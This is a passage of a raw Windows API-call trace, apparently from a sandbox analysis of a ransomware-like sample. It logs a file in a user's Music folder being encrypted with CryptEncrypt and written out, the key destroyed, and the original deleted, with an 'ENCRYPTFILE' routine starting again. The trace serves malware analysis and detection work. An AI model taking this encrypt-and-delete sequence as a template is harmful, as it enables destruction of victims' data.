[0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0110.667] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0110.668] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e8ab0 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0110.668] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0110.668] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0110.668] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0110.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0110.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0110.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0110.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0110.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0110.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0110.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0110.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0110.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0110.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0110.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0110.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0110.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0110.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0110.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0110.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0110.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0110.669] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0110.669] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0110.669] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.669] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0110.669] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.670] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0110.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca730, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0110.670] CryptEncrypt (in: hKey=0x41ac100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x12e0b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x12e10) returned 1 [0110.671] CharLowerBuffW (in: lpsz="byte[77329]", cchLength=0xb | out: lpsz="byte[77329]") returned 0xb [0110.672] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.672] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0110.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caa00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0110.673] CryptEncrypt (in: hKey=0x41ac100, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49ace20*, pdwDataLen=0x144e790*=0x12e0b, dwBufLen=0x12e10 | out: pbData=0x49ace20*, pdwDataLen=0x144e790*=0x12e10) returned 1 [0110.673] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0110.673] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0110.673] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.675] WriteFile (in: hFile=0x258, lpBuffer=0x4528e28*, nNumberOfBytesToWrite=0x12e10, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x4528e28*, lpNumberOfBytesWritten=0x144f194*=0x12e10, lpOverlapped=0x0) returned 1 [0110.677] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0110.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0110.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca1a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0110.677] CryptDestroyKey (hKey=0x41ac100) returned 1 [0110.677] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0110.677] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0110.677] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.677] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0110.677] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0110.677] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0110.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.677] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0110.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0110.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0110.678] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0110.678] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0110.678] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0110.678] FreeLibrary (hLibModule=0x756e0000) returned 1 [0110.678] CloseHandle (hObject=0x298) returned 1 [0110.678] CloseHandle (hObject=0x258) returned 1 [0110.733] TranslateMessage (lpMsg=0x144f534) returned 0 [0110.734] DispatchMessageW (lpMsg=0x144f534) returned 0x0 [0110.734] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0110.734] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0110.734] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0110.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0110.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0110.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0110.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0110.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0110.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0110.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0110.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0110.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0110.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0110.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0110.734] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\Juj1PsS7vx.m4a", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\Juj1PsS7vx.m4a", lpFilePart=0x0) returned 0x24 [0110.734] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0110.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369d18 [0110.734] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Juj1PsS7vx.m4a" (normalized: "c:\\users\\fd1hvy\\music\\juj1pss7vx.m4a")) returned 0x20 [0110.734] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0110.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0110.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0110.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0110.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0110.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0110.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0110.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0110.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0110.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0110.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0110.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c10 [0110.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0110.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d90 [0110.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0110.735] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0110.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c10 | out: hHeap=0x1780000) returned 1 [0110.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0110.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0110.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0110.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0110.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0110.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0110.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0110.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0110.735] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0110.735] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\Juj1PsS7vx.m4a", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x935f67b0, ftCreationTime.dwHighDateTime=0x1d5e9c5, ftLastAccessTime.dwLowDateTime=0xf1ec05f0, ftLastAccessTime.dwHighDateTime=0x1d5ed3e, ftLastWriteTime.dwLowDateTime=0xf1ec05f0, ftLastWriteTime.dwHighDateTime=0x1d5ed3e, nFileSizeHigh=0x0, nFileSizeLow=0x12e0b, dwReserved0=0x0, dwReserved1=0xdf0000, cFileName="Juj1PsS7vx.m4a", cAlternateFileName="JUJ1PS~1.M4A")) returned 0x41ac280 [0110.736] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Juj1PsS7vx.m4a" (normalized: "c:\\users\\fd1hvy\\music\\juj1pss7vx.m4a")) returned 1 [0110.779] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x935f67b0, ftCreationTime.dwHighDateTime=0x1d5e9c5, ftLastAccessTime.dwLowDateTime=0xf1ec05f0, ftLastAccessTime.dwHighDateTime=0x1d5ed3e, ftLastWriteTime.dwLowDateTime=0xf1ec05f0, ftLastWriteTime.dwHighDateTime=0x1d5ed3e, nFileSizeHigh=0x0, nFileSizeLow=0x12e0b, dwReserved0=0x0, dwReserved1=0xdf0000, cFileName="Juj1PsS7vx.m4a", cAlternateFileName="JUJ1PS~1.M4A")) returned 0 [0110.779] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369d18 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0110.780] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0110.780] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf400 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7860 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9a10 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0110.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0110.780] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0110.780] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0110.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0110.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0110.781] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0110.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0110.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0110.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0110.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21a0 [0110.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0110.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9a10 [0110.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0110.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0110.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0110.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0110.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0110.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0110.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0110.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0110.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0110.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0110.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0110.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7b00 [0110.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918f8 | out: hHeap=0x1780000) returned 1 [0110.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0110.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0110.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0110.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0110.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9b78 [0110.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0110.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0110.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0110.782] RtlAllocateHeap 